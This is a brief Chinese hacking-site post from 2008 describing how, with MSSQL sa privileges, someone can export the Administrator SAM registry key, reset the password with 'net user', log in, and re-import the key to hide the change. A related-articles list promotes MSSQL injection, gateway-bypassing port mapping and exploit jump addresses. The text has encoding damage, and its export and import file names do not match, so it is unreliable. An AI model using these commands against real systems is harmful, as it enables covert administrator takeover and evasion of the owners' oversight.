注冊(cè)表導(dǎo)出管理員密碼文件
更新時(shí)間:2008年05月07日 23:52:54 作者:
來源:紅狼
sa默認(rèn)可以讀sam鍵.應(yīng)該。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
net user administrator test
用administrator登陸.
用完機(jī)器后
reg import c:\test.reg
根本不用克隆.
找到對(duì)應(yīng)的sid.
相關(guān)文章
網(wǎng)絡(luò)安全滲透測(cè)試使用goby檢測(cè)log4j漏洞
這篇文章主要為大家介紹了網(wǎng)絡(luò)安全滲透測(cè)試使用goby檢測(cè)log4j漏洞的過程方法示例有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步2022-02-02巧用端口映射 不通過網(wǎng)關(guān)開放任意內(nèi)網(wǎng)(LCX.exe)
巧用端口映射 不通過網(wǎng)關(guān)開放任意內(nèi)網(wǎng)(LCX.exe)...2007-02-02MSSQL注入PUBLIC權(quán)限下的xp_dirtree再度利用方法
MSSQL注入PUBLIC權(quán)限下的xp_dirtree再度利用方法...2007-10-10一些通用跳轉(zhuǎn)地址,XXOXX的時(shí)候有點(diǎn)用
近日在寫exploit的時(shí)候需要用到一些其他語(yǔ)言的call ebx的跳轉(zhuǎn)地址,但是metasploit的opcode DB沒有包括繁體中文、日文、韓文機(jī)器的跳轉(zhuǎn)地址,所以費(fèi)了點(diǎn)時(shí)間收集了下,在這里要感謝傲少提供的機(jī)器給我去找地址?,F(xiàn)在貼到這里,方便大家。2008-09-09